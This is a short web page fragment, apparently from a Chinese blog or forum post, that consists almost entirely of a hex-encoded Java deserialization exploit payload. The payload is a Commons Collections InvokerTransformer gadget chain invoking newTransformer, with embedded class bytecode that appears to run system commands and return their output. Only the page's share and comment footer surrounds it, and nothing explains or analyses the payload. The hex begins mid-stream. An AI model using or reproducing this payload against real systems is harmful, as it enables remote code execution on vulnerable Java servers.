70000004E004F0001000000880050004D00000051000000100002FF008600010700520001070053000001005400550003003E0000003F0000000300000001B100000002003F000000060001000000350040000000200003000000010050004D00000000000100560057000100000001005800590002005A000000040001005B005C0000000902005600000058000000010054005D0003003E000000490000000400000001B100000002003F0000000600010000003A00400000002A0004000000010050004D00000000000100560057000100000001005E005F000200000001006000610003005A000000040001005B005C0000000D0300560000005E0000006000000001003C00620002003E0000003D00010002000000052AB70001B100000002003F0000000A00020000003C0004003D0040000000160002000000050050004D000000000005006300640001005C00000005010063000000010065003D0003003E000001E100060008000000CDB80002C0001BC0001BB6001C4CB80002C0001BC0001BB6001D4D2B121EB9001F02004E2CB9002001003A042DC6009312213A051222B80023B600241225B60026990021BB00275906BD002859031229535904122A5359052D53B7002B3A06A7001EBB00275906BD00285903122C535904122D5359052D53B7002B3A06BB002E591906B6002FB60030B700311232B600333A071907B6003499000B1907B60035A7000519053A051907B6003619041905B600371904B600381904B60039A7000C2C110194B9003A0200A700044EB10001001A00C800CB001A0003003F00000052001400000041000D0042001A004400230045002B0046002F0047003300490043004A0061004C007C004E0092004F00A6005000AB005100B2005200B7005300BC005400BF005500C8005800CB005700CC0059004000000066000A005E000300660067000600330089006800640005007C00400066006700060092002A0069006A0007002300A5006B00640003002B009D006C006D000400CC0000004E004F0003000000CD0050004D0000000D00C0006E006F0001001A00B30070007100020051000000360008FF006100060700520700720700730700740700750700740000FC001A070076FC002507007741070074F8001AF900084207005300005A000000040001007800790000000E0001007A0001007B5B000173007C0002007D00000002007E0079000000060001007F0000707400025A3370770100787372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D6571007E00125B000B69506172616D547970657371007E001578707074000E6E65775472616E73666F726D6572707371007E00003F4000000000000C77080000001000000000787874000362626278;
转载
分享
0 条评论
可输入 255 字
发布投稿
